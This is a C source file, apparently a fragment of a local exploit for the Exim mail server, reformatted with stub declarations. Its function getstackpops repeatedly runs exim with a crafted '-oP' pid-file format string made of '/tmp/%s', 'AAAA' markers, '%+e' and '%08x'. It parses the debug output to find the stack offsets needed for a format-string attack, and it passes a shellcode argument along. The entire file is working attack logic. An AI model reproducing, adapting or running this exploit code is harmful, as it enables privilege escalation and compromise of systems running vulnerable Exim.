
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int FILE ;


 int PADDING ;
 int SIGINT ;
 int calc_bytes_written (char*) ;
 int check_for_AAAA (char*) ;
 int close (int) ;
 int dup2 (int,int) ;
 int execl (int ,char*,char*,char*,char*,char*,char*,char*,char*,int ,int *) ;
 int exit (int) ;
 int fclose (int *) ;
 int * fdopen (int,char*) ;
 int fgets (char*,int,int *) ;
 int fork () ;
 int kill (int,int ) ;
 int path ;
 int perror (char*) ;
 scalar_t__ pipe (int*) ;
 int port ;
 int printf (char*,...) ;
 int shellcode ;
 int sprintf (char*,char*,int) ;
 int strcat (char*,char*) ;
 int strcpy (char*,char*) ;
 int strlen (char*) ;
 scalar_t__ strstr (char*,char*) ;
 int usleep (int) ;

void getstackpops(int *bigs, int *smalls, int *bytes_written)
{
   int cpid;
   int pipedes[2];
   int found=0;
   int bs=0, ss=1;
   char hilf[10];

   printf("Getting stackpops ...\n");
   *bigs=0;
   *smalls=1;

   while(!found)
   {
      if(pipe(pipedes))
      {
         perror("pipe");
         exit(1);
      }

      port++;
      cpid=fork();
      if(cpid==0)
      {


         char fs[10000];
         int i;


         close(2);
         dup2(pipedes[1],2);



         strcpy(fs,"/tmp/%s");
         for(i=0;i<PADDING;i++)
            strcat(fs,"Z");
         strcat(fs,"0000AAAA0000AAAA0000AAAA0000AAAA");
         for(i=0;i<bs;i++)
            strcat(fs,"%+e");
         for(i=0;i<ss;i++)
            strcat(fs,"%08x");


         sprintf(hilf,"%d",port);
         execl(path,"exim","-bd","-d","-oX",hilf,"-oP",fs,"-F",shellcode,((void*)0));
      }
      else if(cpid>0)
      {

         FILE *fp=fdopen(pipedes[0],"r");
         char line[10000];
         if(fp)
         {
            do
            {
               fgets(line,10000,fp);
               line[strlen(line)-1]=0;

               if(strstr(line,"pid written to ") ||
                  strstr(line,"failed to open pid file "))
               {
                  if(strstr(line,"nan")) printf("watch out, nan encountered.\n");
                  if(check_for_AAAA(line)==1)
                  {

                     found=1;
                     bs--;
                     printf("Stackpops found ;-)\n");
                     *bigs=bs;
                     *smalls=ss;
                     *bytes_written=calc_bytes_written(line)-13;
                  }
                  else
                  {

                     ss++;
                     if(ss==3) bs++, ss=1;
                     printf("trying bs=%d, ss=%d\n",bs,ss);
                  }
               }
            } while(!strstr(line,"Listening..."));
            fclose(fp);
         }
         else perror("fdopen");
         kill(cpid,SIGINT);
         usleep(100000);
      }
      else perror("fork");
      close(pipedes[0]);
      close(pipedes[1]);
   }
}
